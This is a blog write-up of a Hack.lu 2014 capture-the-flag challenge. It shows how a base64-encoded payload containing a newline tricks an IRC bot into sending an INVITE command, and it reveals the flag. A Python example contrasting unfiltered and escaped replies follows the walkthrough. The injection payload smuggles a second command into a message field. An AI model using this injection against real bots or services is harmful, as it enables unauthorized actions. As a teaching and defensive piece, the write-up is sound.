Hack.lu CTF 2014 misc-200: Barmixing-Bot

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Legend:
hhby1 – me, barmixing-bot – barmixing-bot :)

hhby1: !help
barmixing-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

hhby1: !status
barmixing-bot: My name is barmixing-bot, my uptime is 0 hours 40 minutes and 33 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, #new_chan2

So, we need to get into the password-protected channel #hacklu-secret-channel. To do this, you can either find the password or get the bot to invite you. I chose the second way :) The IRC protocol is based on one-line commands, so a single message cannot span several lines. If we force the bot to send a \n character to the server, though, whatever follows it is treated as a separate command, and the !base64d command lets us do exactly that.

➜  ~  echo -e "hello\nINVITE hhby1 #hacklu-secret-channel\n" | base64
aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==

hhby1: !base64d aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==
barmixing-bot: hello
* barmixing-bot invites you to channel #hacklu-secret-channel

Topic for #hacklu-secret-channel: FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH
Topic for #hacklu-secret-channel set by freddyb!~freddyb@fluxfingers.syssec.ruhr-uni-bochum.de at 12:41:54 on 10/18/14
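
The root cause above is that the bot writes decoded text to its server connection without filtering line terminators. The following is an added example, not the bot's code (the write-up does not show it): function names are hypothetical and a server that accepts a bare LF as a terminator is assumed. It compares that behaviour with an escaped, guarded reply, using the payload from this post.

```python
import base64

# Payload taken from the write-up; all function names are hypothetical.
PAYLOAD = "aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg=="
LINE_BREAKERS = "\r\n\x00"  # characters that end or corrupt an IRC message


def server_view(wire):
    """Split bytes into messages as a server accepting bare LF would (assumption)."""
    return [m for m in wire.replace(b"\r", b"\n").split(b"\n") if m]


def reply_unfiltered(nick, b64):
    """Behaviour the write-up implies: decoded text reaches the socket as-is."""
    text = base64.b64decode(b64).decode("utf-8", "replace")
    return f"PRIVMSG {nick} :{text}\r\n".encode()


def escape_controls(text):
    """Output encoding: render control characters as visible \\xNN escapes."""
    return "".join(
        f"\\x{ord(c):02x}" if ord(c) < 0x20 or ord(c) == 0x7F else c
        for c in text
    )


def send_line(command, target, text):
    """Sink-side guard: one call can only ever produce one protocol line."""
    for field in (command, target, text):
        if any(c in LINE_BREAKERS for c in field):
            raise ValueError("CR, LF or NUL in outgoing IRC field")
    body = f"{command} {target} :{text}".encode()[:510]  # 512-byte limit incl. CRLF
    return body + b"\r\n"


def reply_filtered(nick, b64):
    """Hardened !base64d reply: escape first, then pass through the guard."""
    text = base64.b64decode(b64).decode("utf-8", "replace")
    return send_line("PRIVMSG", nick, escape_controls(text))


if __name__ == "__main__":
    print("unfiltered:", server_view(reply_unfiltered("hhby1", PAYLOAD)))
    print("filtered:  ", server_view(reply_filtered("hhby1", PAYLOAD)))
```

Escaping at the command handler keeps the decoded output readable, while the check in `send_line` protects every other command that might pass user-influenced text to the socket.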

2 Comments

  1. Fuhgeddaboudit

    24.10.2014 at 05:10

    That’s a really nice solution; however, my IRC client just shows the topic for #hacklu-secret-channel with the /LIST command :)

    Ping me please, I want to join your team for the next CTF

    • Alexey Kaminsky

      24.10.2014 at 08:35

      That’s because the +s flag was unset after the CTF :-)
      Okay, I’ll ping you

© 2017 akaminsky.net